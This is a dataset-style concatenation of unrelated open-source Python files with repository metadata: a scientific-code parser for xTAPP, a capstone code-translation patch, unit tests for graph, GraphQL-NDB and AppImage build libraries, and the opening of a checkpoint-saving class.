class IBMPublicCloud(_General):
_icon = "ibm-public-cloud.png"
class IdentityAccessManagement(_General):
_icon = "identity-access-management.png"
class IdentityProvider(_General):
_icon = "identity-provider.png"
class InfrastructureSecurity(_General):
_icon = "infrastructure-security.png"
class Internet(_General):
_icon = "internet.png"
class IotCloud(_General):
_icon = "iot-cloud.png"
class MicroservicesApplication(_General):
_icon = "microservices-application.png"
class MicroservicesMesh(_General):
_icon = "microservices-mesh.png"
class MonitoringLogging(_General):
_icon = "monitoring-logging.png"
class Monitoring(_General):
_icon = "monitoring.png"
class ObjectStorage(_General):
_icon = "object-storage.png"
class OfflineCapabilities(_General):
_icon = "offline-capabilities.png"
class Openwhisk(_General):
_icon = "openwhisk.png"
class PeerCloud(_General):
_icon = "peer-cloud.png"
class RetrieveRank(_General):
_icon = "retrieve-rank.png"
class Scalable(_General):
_icon = "scalable.png"
class ServiceDiscoveryConfiguration(_General):
_icon = "service-discovery-configuration.png"
class TextToSpeech(_General):
_icon = "text-to-speech.png"
class TransformationConnectivity(_General):
_icon = "transformation-connectivity.png"
# Aliases
|
514593362ededf0d0c41028e143217a436467e51
|
ca10e5645aa2e8152d6219d31ac77d3ed50096c0
|
/suite/auto-sync/CppTranslator/Patches/SizeAssignments.py
|
1f4144e2ddc9b0b56103c16b7d1b57534c2ddb39
|
[
"BSD-3-Clause",
"NCSA"
] |
permissive
|
capstone-engine/capstone
|
fc4f1b14eded800818f2ed64eafaf342e6046f9b
|
f036d2dbb6a9f0d1e0dc9c14b4f44878aeed260a
|
refs/heads/next
| 2023-09-02T14:38:15.356818
| 2023-08-30T03:13:17
| 2023-08-30T03:13:17
| 14,735,429
| 1,390
| 292
|
NOASSERTION
| 2023-09-14T20:47:20
| 2013-11-27T02:32:11
|
C
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
SizeAssignments.py
|
import re
from tree_sitter import Node
from Patches.HelperMethods import get_text, get_function_params_of_node
from Patches.Patch import Patch
class SizeAssignment(Patch):
"""
Patch Size = <num>
to *Size = <num>
if Size is a reference.
"""
def __init__(self, priority: int):
super().__init__(priority)
def get_search_pattern(self) -> str:
return "(assignment_expression" ' ((identifier) @id (#eq? @id "Size"))' ") @assign"
def get_main_capture_name(self) -> str:
return "assign"
def get_patch(self, captures: [(Node, str)], src: bytes, **kwargs) -> bytes:
assign = captures[0][0]
assign_text = get_text(src, assign.start_byte, assign.end_byte)
param_list = get_function_params_of_node(assign)
if not param_list:
return assign_text
for p in param_list.named_children:
p_text = get_text(src, p.start_byte, p.end_byte)
if b"&Size" in p_text:
return re.sub(b"Size", b"*Size", assign_text)
return assign_text
|
027e04c3aa481d58852d139e71570cbc2fb43b74
|
4d158bde772e67117ea949efa45b795ed055850b
|
/tools/interface/xTAPP.py
|
4b33a0e52723bed8b70fdfd5be0d68039f0dbcdf
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ttadano/alamode
|
fc9e9371d95b6f84e43bc59b559879ad915cccb9
|
b4fd81af88a322356492e6648965d1d2e004f7c3
|
refs/heads/develop
| 2023-07-06T05:58:45.217759
| 2023-06-16T11:48:16
| 2023-06-16T11:48:16
| 22,987,128
| 130
| 56
|
MIT
| 2023-04-01T06:49:22
| 2014-08-15T11:05:42
|
C++
|
UTF-8
|
Python
| false
| false
| 17,751
|
py
|
xTAPP.py
|
#
# xTAPP.py
#
# Interface to xTAPP (http://xtapp.cp.is.s.u-tokyo.ac.jp)
#
# Copyright (c) 2014-2020 Terumasa Tadano
#
# This file is distributed under the terms of the MIT license.
# Please see the file 'LICENCE.txt' in the root directory
# or http://opensource.org/licenses/mit-license.php for information.
#
import numpy as np
class XtappParser(object):
def __init__(self):
self._prefix = None
self._lattice_vector = None
self._inverse_lattice_vector = None
self._kd = None
self._header_part = None
self._nat = 0
self._x_fractional = None
self._counter = 1
self._nzerofills = 0
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
self._force_conversion_factor = 1.0
self._initial_structure_loaded = False
self._print_disp = True
self._print_force = True
self._print_energy = False
self._print_born = False
self._BOHR_TO_ANGSTROM = 0.5291772108
self._RYDBERG_TO_EV = 13.60569253
def load_initial_structure(self, file_in):
lavec, nat, nkd, str_tappinput \
= self._read_tappinput(file_in, self._BOHR_TO_ANGSTROM)
x, kd, str_atom = self._read_atomdata(file_in, nat, nkd)
str_kpoint = self._read_kpdata(file_in)
str_struct_opt, str_opt_constr = self._read_structure_optimize(file_in)
str_header = ""
for entry in str_tappinput:
str_header += entry
for entry in str_kpoint:
str_header += entry
for entry in str_struct_opt:
str_header += entry
for entry in str_opt_constr:
str_header += entry
for i in range(nkd + 1):
str_header += str_atom[i]
self._lattice_vector = lavec
self._inverse_lattice_vector = np.linalg.inv(lavec)
self._x_fractional = x
self._nat = nat
self._kd = kd
self._header_part = str_header
self._initial_structure_loaded = True
def generate_structures(self, prefix, header_list, disp_list):
self._set_number_of_zerofill(len(disp_list))
self._prefix = prefix
for header, disp in zip(header_list, disp_list):
self._generate_input(header, disp)
def parse(self, initial_cg, stdout_files, stdout_file_offset, str_unit,
output_flags, filter_emin=None, filter_emax=None):
if not self._initial_structure_loaded:
self.load_initial_structure(initial_cg)
self._set_unit_conversion_factor(str_unit)
self._set_output_flags(output_flags)
if self._print_disp or self._print_force:
self._print_displacements_and_forces(stdout_files,
stdout_file_offset,
filter_emin,
filter_emax)
elif self._print_energy:
self._print_energies(stdout_files, stdout_file_offset)
def _generate_input(self, header, disp):
nsym = 1
symop = []
symop.append([1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0])
denom_tran = 1
has_inv = 0
filename = self._prefix + str(self._counter).zfill(self._nzerofills) + ".cg"
with open(filename, 'w') as f:
f.write("%s" % self._header_part)
for i in range(self._nat):
f.write("%i %20.15f %20.15f %20.15f\n" % (self._kd[i],
self._x_fractional[i][0] + disp[i, 0],
self._x_fractional[i][1] + disp[i, 1],
self._x_fractional[i][2] + disp[i, 2]))
f.write("# symmetry data\n")
f.write("&symmetry\n")
f.write(" number_sym_op = %i\n" % nsym)
f.write(" has_inversion = %i\n" % has_inv)
f.write(" denom_trans = %i\n" % denom_tran)
f.write("/\n")
mat_tmp = np.zeros((3, 3), dtype=int)
for elems in symop:
for i in range(3):
for j in range(3):
mat_tmp[i][j] = elems[3 * i + j]
mat_inv = np.matrix(mat_tmp).I
for i in range(3):
for j in range(3):
f.write("%4i" % mat_inv[i, j])
f.write(" ")
for i in range(3):
f.write("%4i" % elems[9 + i])
f.write("\n")
f.write("\n")
self._counter += 1
def _set_number_of_zerofill(self, npattern):
nzero = 1
while True:
npattern //= 10
if npattern == 0:
break
nzero += 1
self._nzerofills = nzero
@staticmethod
def _read_tappinput(file_in, Bohr_to_Ang):
list_tappinput = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "main" in line and "data" in line:
flag_add = True
list_tappinput.append(line)
elif "#" in line:
flag_add = False
elif flag_add:
list_tappinput.append(line)
if len(list_tappinput) == 0:
raise RuntimeError("main data entry not found")
list_tappinput_new = []
for obj in list_tappinput:
obj_split = obj.rstrip().split(',')
for subobj in obj_split:
if subobj:
list_tappinput_new.append(subobj)
str_input = ""
for entry in list_tappinput_new:
str_input += entry + " "
entrylist = str_input.split()
lavec_list = []
a = 0.0
nkd = 0
nat = 0
# get lattice_factor
for i in range(len(entrylist)):
if "lattice_factor" in entrylist[i]:
a = float(entrylist[i + 2])
if "lattice_list" in entrylist[i]:
for j in range(9):
lavec_list.append(entrylist[i + j + 2])
if "number_element" in entrylist[i]:
nkd = int(entrylist[i + 2])
if "number_atom" in entrylist[i]:
nat = int(entrylist[i + 2])
if a == 0.0:
raise RuntimeError("Couldn't read lattice_factor")
if nkd == 0:
raise RuntimeError("Couldn't read number_element")
if nat == 0:
raise RuntimeError("Couldn't read number_atom")
if len(lavec_list) != 9:
raise RuntimeError("Couldn't read lattice_list")
lavec = np.zeros((3, 3))
a *= Bohr_to_Ang
for i in range(3):
for j in range(3):
lavec[j][i] = a * float(lavec_list[3 * i + j])
return lavec, nat, nkd, list_tappinput
def _set_unit_conversion_factor(self, str_unit):
if str_unit == "ev":
self._disp_conversion_factor = self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = 2.0 * self._RYDBERG_TO_EV
elif str_unit == "rydberg":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 2.0
elif str_unit == "hartree":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
else:
raise RuntimeError("This cannot happen.")
self._force_conversion_factor = self._energy_conversion_factor / self._disp_conversion_factor
def _set_output_flags(self, output_flags):
self._print_disp, self._print_force, \
self._print_energy, self._print_born = output_flags
@property
def nat(self):
return self._nat
@property
def lattice_vector(self):
return self._lattice_vector
@property
def inverse_lattice_vector(self):
return self._inverse_lattice_vector
@property
def atomic_kinds(self):
return self._kd
@property
def x_fractional(self):
return self._x_fractional
def _print_displacements_and_forces(self, stdout_files,
file_offset, filter_emin, filter_emax):
x0 = np.round(self._x_fractional, 8)
lavec_transpose = self._lattice_vector.transpose() / self._BOHR_TO_ANGSTROM
vec_refold = np.vectorize(self._refold)
if file_offset is None:
disp_offset = np.zeros((self._nat, 3))
force_offset = np.zeros((self._nat, 3))
epot_offset = 0.0
else:
x0_offset = self._get_coordinates_xtapp(file_offset, self._nat)
force_offset = self._get_atomicforces_xtapp(file_offset, self._nat)
epot_offset = self._get_energies_xtapp(file_offset)
try:
x0_offset = np.reshape(x0_offset, (self._nat, 3))
except:
raise RuntimeError("File %s contains too many position entries" % file_offset)
disp_offset = x0_offset - x0
try:
force_offset = np.reshape(force_offset, (self._nat, 3))
except:
raise RuntimeError("File %s contains too many position entries" % file_offset)
for search_target in stdout_files:
x = self._get_coordinates_xtapp(search_target, self._nat)
force = self._get_atomicforces_xtapp(search_target, self._nat)
epot = self._get_energies_xtapp(search_target)
ndata_disp = len(x) // (3 * self._nat)
ndata_force = len(force) // (3 * self._nat)
if ndata_disp != ndata_force:
print(
"Error: The number of entries of displacement and force is inconsistent.")
print("Ndata disp : %d, Ndata force : %d" %
(ndata_disp, ndata_force))
exit(1)
ndata_energy = len(epot)
if ndata_energy != ndata_disp:
raise RuntimeError("The numbers of displacement and energy entries are different.")
ndata = ndata_disp
x = np.reshape(x, (ndata, self._nat, 3))
force = np.reshape(force, (ndata, self._nat, 3))
epot -= epot_offset
epot *= self._RYDBERG_TO_EV * 2.0
for idata in range(ndata):
if filter_emin is not None:
if filter_emin > epot[idata]:
continue
if filter_emax is not None:
if filter_emax < epot[idata]:
continue
if self._print_disp:
disp = x[idata, :, :] - x0 - disp_offset
disp = np.dot(vec_refold(disp), lavec_transpose)
disp *= self._disp_conversion_factor
if self._print_force:
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d, E_pot (eV): %s" %
(search_target, idata + 1, epot[idata]))
if self._print_disp and self._print_force:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F %20.8E %15.8E %15.8E" % (disp[i, 0],
disp[i, 1],
disp[i, 2],
f[i, 0],
f[i, 1],
f[i, 2]))
elif self._print_disp:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F" % (disp[i, 0],
disp[i, 1],
disp[i, 2]))
elif self._print_force:
for i in range(self._nat):
print("%15.8E %15.8E %15.8E" % (f[i, 0],
f[i, 1],
f[i, 2]))
def _print_energies(self, stdout_files, file_offset):
if file_offset is None:
etot_offset = 0.0
else:
data = self._get_energies_xtapp(file_offset)
if len(data) > 1:
raise RuntimeError("File %s contains too many energy entries" % file_offset)
etot_offset = data[0]
print("# Etot")
for search_target in stdout_files:
etot = self._get_energies_xtapp(search_target)
for idata in range(len(etot)):
val = etot[idata] - etot_offset
val *= self._energy_conversion_factor
print("%19.11E" % val)
@staticmethod
def _read_atomdata(file_in, nat_in, nkd_in):
list_atom = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "atom" in line and "data" in line:
flag_add = True
list_atom.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_atom.append(line)
if len(list_atom) == 0:
raise RuntimeError("atom data entry not found")
x_out = np.zeros((nat_in, 3), dtype=float)
kd_out = np.zeros(nat_in, dtype=int)
for i in range(nat_in):
list_tmp = list_atom[i + nkd_in + 1].rstrip().split()
kd_out[i] = int(list_tmp[0])
for j in range(3):
x_out[i][j] = float(list_tmp[j + 1])
return x_out, kd_out, list_atom
@staticmethod
def _read_kpdata(file_in):
list_kpoint = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "k-points" in line.rstrip():
flag_add = True
list_kpoint.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_kpoint.append(line)
if len(list_kpoint) == 0:
raise RuntimeError("k-points data entry not found")
return list_kpoint
@staticmethod
def _read_structure_optimize(file_in):
list_opt = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "struct_opt" in line.rstrip():
flag_add = True
list_opt.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_opt.append(line)
if len(list_opt) == 0:
raise RuntimeError("struct_opt entry not found")
list_opt2 = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if "str_opt_constr" in line.rstrip():
flag_add = True
list_opt2.append(line)
elif "#" in line.strip():
flag_add = False
elif flag_add:
list_opt2.append(line)
if len(list_opt2) == 0:
raise RuntimeError("str_opt_constr entry not found")
return list_opt, list_opt2
@staticmethod
def _get_coordinates_xtapp(str_file, nat):
found_tag = False
f = open(str_file, 'r')
line = f.readline()
x = []
while line:
if "atom_position" in line:
found_tag = True
for i in range(nat):
line = f.readline()
x.extend([t for t in line.rstrip().split()[1:]])
break
line = f.readline()
if not found_tag:
raise RuntimeError("atom_position tag not found in %s" % str_file)
f.close()
return np.array(x, dtype=float)
@staticmethod
def _get_atomicforces_xtapp(str_file, nat):
found_tag = False
f = open(str_file, 'r')
line = f.readline()
force = []
while line:
if "force" in line:
found_tag = True
for i in range(nat):
line = f.readline()
force.extend([t for t in line.rstrip().split()])
break
line = f.readline()
if not found_tag:
raise RuntimeError("force tag not found in %s" % str_file)
f.close()
return np.array(force, dtype=float)
@staticmethod
def _get_energies_xtapp(str_file):
search_tag = "total_energy"
found_tag = False
etot = []
with open(str_file) as openfileobject:
for line in openfileobject:
if search_tag in line:
energy_str = line.rstrip().split()[2]
etot.extend([energy_str[:-1]])
found_tag = True
if not found_tag:
raise RuntimeError("%s tag not found in %s" % (search_tag, str_file))
return np.array(etot, dtype=float)
@staticmethod
def _refold(x):
if x >= 0.5:
return x - 1.0
elif x < -0.5:
return x + 1.0
else:
return x
|
29e213bc9d1a29530f199035b904ea1b7e172176
|
af101b467134e10270bb72d02f41f07daa7f57d8
|
/tests/test_evaluation/test_functional/test_gaussian_funcs.py
|
fa3d6e76541376c975997f2479de5232d5af967f
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmagic
|
4d864853417db300de4dfe7e83ce380fd1557a23
|
a382f143c0fd20d227e1e5524831ba26a568190d
|
refs/heads/main
| 2023-08-31T14:40:24.936423
| 2023-08-30T05:05:56
| 2023-08-30T05:05:56
| 203,999,962
| 1,370
| 192
|
Apache-2.0
| 2023-09-14T11:39:18
| 2019-08-23T13:04:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 276
|
py
|
test_gaussian_funcs.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import numpy as np
from mmagic.evaluation.functional import gauss_gradient
def test_gauss_gradient():
img = np.random.randint(0, 255, size=(8, 8, 3))
grad = gauss_gradient(img, 1.4)
assert grad.shape == (8, 8, 3)
|
f06295f08869cd4fd90582c2e6ea2a5135536bfa
|
93713f46f16f1e29b725f263da164fed24ebf8a8
|
/Library/lib/python3.7/site-packages/networkx/algorithms/node_classification/tests/test_local_and_global_consistency.py
|
3a64fbe7bbcaf5a0ffd4fcf01c65eff0018e3599
|
[
"BSD-3-Clause"
] |
permissive
|
holzschu/Carnets
|
b83d15136d25db640cea023abb5c280b26a9620e
|
1ad7ec05fb1e3676ac879585296c513c3ee50ef9
|
refs/heads/master
| 2023-02-20T12:05:14.980685
| 2023-02-13T15:59:23
| 2023-02-13T15:59:23
| 167,671,526
| 541
| 36
|
BSD-3-Clause
| 2022-11-29T03:08:22
| 2019-01-26T09:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,446
|
py
|
test_local_and_global_consistency.py
|
#!/usr/bin/env python
from nose.tools import *
from nose import SkipTest
import networkx as nx
from networkx.algorithms import node_classification
class TestLocalAndGlobalConsistency:
@classmethod
def setupClass(cls):
global numpy
global scipy
try:
import numpy
except ImportError:
raise SkipTest('NumPy not available.')
try:
import scipy
except ImportError:
raise SkipTest('SciPy not available.')
def test_path_graph(self):
G = nx.path_graph(4)
label_name = 'label'
G.node[0][label_name] = 'A'
G.node[3][label_name] = 'B'
predicted = node_classification.local_and_global_consistency(
G, label_name=label_name)
assert_equal(predicted[0], 'A')
assert_equal(predicted[1], 'A')
assert_equal(predicted[2], 'B')
assert_equal(predicted[3], 'B')
@raises(nx.NetworkXError)
def test_no_labels(self):
G = nx.path_graph(4)
node_classification.local_and_global_consistency(G)
@raises(nx.NetworkXError)
def test_no_nodes(self):
G = nx.Graph()
node_classification.local_and_global_consistency(G)
@raises(nx.NetworkXError)
def test_no_edges(self):
G = nx.Graph()
G.add_node(1)
G.add_node(2)
node_classification.local_and_global_consistency(G)
@raises(nx.NetworkXNotImplemented)
def test_digraph(self):
G = nx.DiGraph()
G.add_edge(0, 1)
G.add_edge(1, 2)
G.add_edge(2, 3)
label_name = 'label'
G.node[0][label_name] = 'A'
G.node[3][label_name] = 'B'
node_classification.harmonic_function(G)
def test_one_labeled_node(self):
G = nx.path_graph(4)
label_name = 'label'
G.node[0][label_name] = 'A'
predicted = node_classification.local_and_global_consistency(
G, label_name=label_name)
assert_equal(predicted[0], 'A')
assert_equal(predicted[1], 'A')
assert_equal(predicted[2], 'A')
assert_equal(predicted[3], 'A')
def test_nodes_all_labeled(self):
G = nx.karate_club_graph()
label_name = 'club'
predicted = node_classification.local_and_global_consistency(
G, alpha=0, label_name=label_name)
for i in range(len(G)):
assert_equal(predicted[i], G.node[i][label_name])
|
0a210efb97922df88c2802eb997b66ac6156118d
|
3358a23ed0b97eaca6035778feecb74a97f24d0b
|
/tests/_ndb/test_converter.py
|
026a1f7cb80a3a982a0aaa6758bd28a15e2a816c
|
[
"BSD-3-Clause"
] |
permissive
|
graphql-python/graphene-gae
|
18707958469bccc9e74b1807b3bcd9a7662c490c
|
7cf364eddb6d5b76575f5e80fb97a588c92634a1
|
refs/heads/master
| 2022-09-23T16:19:00.243204
| 2022-09-06T11:33:23
| 2022-09-06T11:33:23
| 58,579,572
| 128
| 15
|
BSD-3-Clause
| 2021-03-25T21:28:06
| 2016-05-11T20:41:37
|
Python
|
UTF-8
|
Python
| false
| false
| 8,128
|
py
|
test_converter.py
|
import mock
from graphene_gae.ndb.types import NdbObjectType
from tests.base_test import BaseTest
from google.appengine.ext import ndb
import graphene
from graphene import List, NonNull, String
from graphene.types.json import JSONString
from graphene.types.datetime import DateTime, Time
from graphene_gae.ndb.fields import NdbKeyStringField, NdbKeyReferenceField, DynamicNdbKeyStringField, DynamicNdbKeyReferenceField
from graphene_gae.ndb.converter import convert_ndb_property
from graphene_gae.ndb.registry import Registry
__author__ = 'ekampf'
class SomeWeirdUnknownProperty(ndb.Property):
pass
class TestNDBConverter(BaseTest):
def __assert_conversion(self, ndb_property_type, expected_graphene_type, *args, **kwargs):
ndb_property = ndb_property_type(*args, **kwargs)
result = convert_ndb_property(ndb_property)
graphene_field = result.field
self.assertEqual(graphene_field._type, expected_graphene_type)
def testUnknownProperty_raisesException(self):
with self.assertRaises(Exception) as context:
prop = SomeWeirdUnknownProperty()
prop._code_name = "my_prop"
convert_ndb_property(prop)
self.assertTrue("Don't know how to convert" in context.exception.message, msg=context.exception.message)
@mock.patch('graphene_gae.ndb.converter.converters')
def testNoneResult_raisesException(self, patch_convert):
from graphene_gae.ndb.converter import convert_ndb_property
patch_convert.get.return_value = lambda *_: None
with self.assertRaises(Exception) as context:
prop = ndb.StringProperty()
prop._code_name = "my_prop"
convert_ndb_property(prop)
expected_message = 'Failed to convert NDB propeerty to a GraphQL field my_prop (StringProperty())'
self.assertTrue(expected_message in context.exception.message, msg=context.exception.message)
def testStringProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.StringProperty, graphene.String)
def testStringProperty_repeated_shouldConvertToList(self):
ndb_prop = ndb.StringProperty(repeated=True)
result = convert_ndb_property(ndb_prop)
graphene_type = result.field._type
self.assertIsInstance(graphene_type, graphene.List)
self.assertEqual(graphene_type.of_type, graphene.String)
def testStringProperty_required_shouldConvertToList(self):
ndb_prop = ndb.StringProperty(required=True)
result = convert_ndb_property(ndb_prop)
graphene_type = result.field._type
self.assertIsInstance(graphene_type, graphene.NonNull)
self.assertEqual(graphene_type.of_type, graphene.String)
def testTextProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.TextProperty, graphene.String)
def testBoolProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.BooleanProperty, graphene.Boolean)
def testIntProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.IntegerProperty, graphene.Int)
def testFloatProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.FloatProperty, graphene.Float)
def testDateProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.DateProperty, DateTime)
def testDateTimeProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.DateTimeProperty, DateTime)
def testTimeProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.TimeProperty, Time)
def testJsonProperty_shouldConvertToString(self):
self.__assert_conversion(ndb.JsonProperty, JSONString)
def testKeyProperty_withSuffix(self):
my_registry = Registry()
class User(ndb.Model):
name = ndb.StringProperty()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User')
prop._code_name = 'user_key'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_id')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertEqual(_type._type, String)
self.assertEqual(conversion[1].name, 'user')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertEqual(_type._type, UserType)
def testKeyProperty_withSuffix_repeated(self):
my_registry = Registry()
class User(ndb.Model):
name = ndb.StringProperty()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User', repeated=True)
prop._code_name = 'user_keys'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_ids')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertIsInstance(_type._type, List)
self.assertEqual(_type._type.of_type, String)
self.assertEqual(conversion[1].name, 'users')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertIsInstance(_type._type, List)
self.assertEqual(_type._type.of_type, UserType)
def testKeyProperty_withSuffix_required(self):
class User(ndb.Model):
name = ndb.StringProperty()
my_registry = Registry()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User', required=True)
prop._code_name = 'user_key'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_id')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertIsInstance(_type._type, NonNull)
self.assertEqual(_type._type.of_type, String)
self.assertEqual(conversion[1].name, 'user')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertIsInstance(_type._type, NonNull)
self.assertEqual(_type._type.of_type, UserType)
def testKeyProperty_withoutSuffix(self):
my_registry = Registry()
class User(ndb.Model):
name = ndb.StringProperty()
class UserType(NdbObjectType):
class Meta:
model = User
registry = my_registry
prop = ndb.KeyProperty(kind='User')
prop._code_name = 'user'
conversion = convert_ndb_property(prop, my_registry)
self.assertLength(conversion, 2)
self.assertEqual(conversion[0].name, 'user_id')
self.assertIsInstance(conversion[0].field, DynamicNdbKeyStringField)
_type = conversion[0].field.get_type()
self.assertIsInstance(_type, NdbKeyStringField)
self.assertEqual(_type._type, String)
self.assertEqual(conversion[1].name, 'user')
self.assertIsInstance(conversion[1].field, DynamicNdbKeyReferenceField)
_type = conversion[1].field.get_type()
self.assertIsInstance(_type, NdbKeyReferenceField)
self.assertEqual(_type._type, UserType)
|
8c20dc23c451a7f655ed1f339a592e984fd63f96
|
d066f7fe739fb78f74ec2de8ccbfefdd4270f60f
|
/tests/commands/run_script.py
|
0150578623e38b6fa246882cfac2f3940e7720fd
|
[
"MIT"
] |
permissive
|
AppImageCrafters/appimage-builder
|
666e75363a74f615cdb3673b3ca9d51a6d292a49
|
f38699ef3644fa5409a5a262b7b6d99d6fb85db9
|
refs/heads/main
| 2023-08-17T06:34:54.029664
| 2023-06-03T17:51:04
| 2023-06-03T17:51:04
| 218,847,680
| 270
| 54
|
MIT
| 2023-09-06T17:04:18
| 2019-10-31T19:44:17
|
Python
|
UTF-8
|
Python
| false
| false
| 2,851
|
py
|
run_script.py
|
import pathlib
import unittest
import roam
from appimagebuilder.commands import RunScriptCommand
from appimagebuilder.context import Context
class RunScriptCommandTestCase(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.fake_context = Context(
recipe_path=pathlib.Path("/tmp/non_existent/AppImageBuilder.yml"),
build_dir=pathlib.Path("/tmp/"),
app_dir=pathlib.Path("/tmp/AppDir"),
app_info=None,
bundle_info=None,
)
def test_set_env(self):
script = roam.Roamer(
[
"export var=1",
"if [ -z ${var+x} ]; then",
" exit 1; ",
"fi",
]
)
command = RunScriptCommand(self.fake_context, script)
command()
def test_run_exit_1(self):
script = roam.Roamer(["exit 1"])
command = RunScriptCommand(self.fake_context, script)
self.assertRaises(RuntimeError, command)
def test_use_pass_env(self):
script = roam.Roamer(
[
"if [ -z ${var+x} ]; then",
" exit 1; ",
"fi",
]
)
command = RunScriptCommand(self.fake_context, script, env={"var": "value"})
command()
def test_builder_env_set(self):
script = roam.Roamer(
[
"echo $BUILDER_ENV",
"if [ -z ${BUILDER_ENV+x} ]; then",
" exit 1; ",
"fi",
]
)
cmd = RunScriptCommand(self.fake_context, script)
cmd()
def test_builder_export_variable(self):
script_1 = roam.Roamer(["echo TEST_VAR=1 >> $BUILDER_ENV"])
script_2 = roam.Roamer(
[
"if [ -z ${TEST_VAR+x} ]; then",
" exit 1; ",
"fi",
]
)
cmd1 = RunScriptCommand(self.fake_context, script_1)
cmd1()
cmd2 = RunScriptCommand(self.fake_context, script_2)
cmd2()
def test_target_appdir_env_set(self):
s = roam.Roamer(['[[ ! -z "$TARGET_APPDIR" ]] && echo $TARGET_APPDIR'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
def test_recipe_env_set(self):
s = roam.Roamer(['[[ ! -z "$RECIPE" ]] && echo $RECIPE'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
def test_build_dir_env_set(self):
s = roam.Roamer(['[[ ! -z "$BUILD_DIR" ]] && echo $BUILD_DIR'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
def test_source_dir_env_set(self):
s = roam.Roamer(['[[ ! -z "$SOURCE_DIR" ]] && echo $SOURCE_DIR'])
cmd1 = RunScriptCommand(self.fake_context, s)
cmd1()
if __name__ == "__main__":
unittest.main()
|
078d748fafebef0b18fcbaed21769c049f1c184a
|
9784a90cac667e8e0aaba0ca599b4255b215ec67
|
/common/train_log_param_saver.py
|
e2e1e7af52f11a56922d906c3cdf058b6f1dd3d1
|
[
"MIT"
] |
permissive
|
osmr/imgclsmob
|
d2f48f01ca541b20119871393eca383001a96019
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
refs/heads/master
| 2022-07-09T14:24:37.591824
| 2021-12-14T10:15:31
| 2021-12-14T10:15:31
| 140,285,687
| 3,017
| 624
|
MIT
| 2022-07-04T15:18:37
| 2018-07-09T12:57:46
|
Python
|
UTF-8
|
Python
| false
| false
| 11,279
|
py
|
train_log_param_saver.py
|
import os
import shutil
class TrainLogParamSaver(object):
"""
Train logger does the following:
1. save several the last model checkpoints, for disaster recovery,
2. save several the best model checkpoints, to prevent overfitting,
3. save pure evaluation metric values to log-file for observer.
Parameters:
----------
checkpoint_file_name_prefix : str
prefix for checkpoint file name (without parent dir)
last_checkpoint_file_name_suffix : str or None
suffix for last checkpoint file name
if None then checkpoint_file_name_prefix is not modified
best_checkpoint_file_name_suffix : str or None
suffix for best checkpoint file name
last_checkpoint_dir_path : str
directory path for saving the last checkpoint files
best_checkpoint_dir_path : str or None
directory name for saving the best checkpoint files
if None then best_checkpoint_dir_path = last_checkpoint_dir_path
last_checkpoint_file_count : int
count of the last checkpoint files
best_checkpoint_file_count : int
count of the best checkpoint files
checkpoint_file_save_callback : function or None
Callback for real saving of checkpoint file
checkpoint_file_exts : tuple of str
List of checkpoint file extensions
save_interval : int
Interval of checkpoint file saving
num_epochs : int
Number of epochs for saving last checkpoint if save_interval > 1
bigger : list of bool
Should be bigger for each value of evaluation metric values
mask : list of bool or None
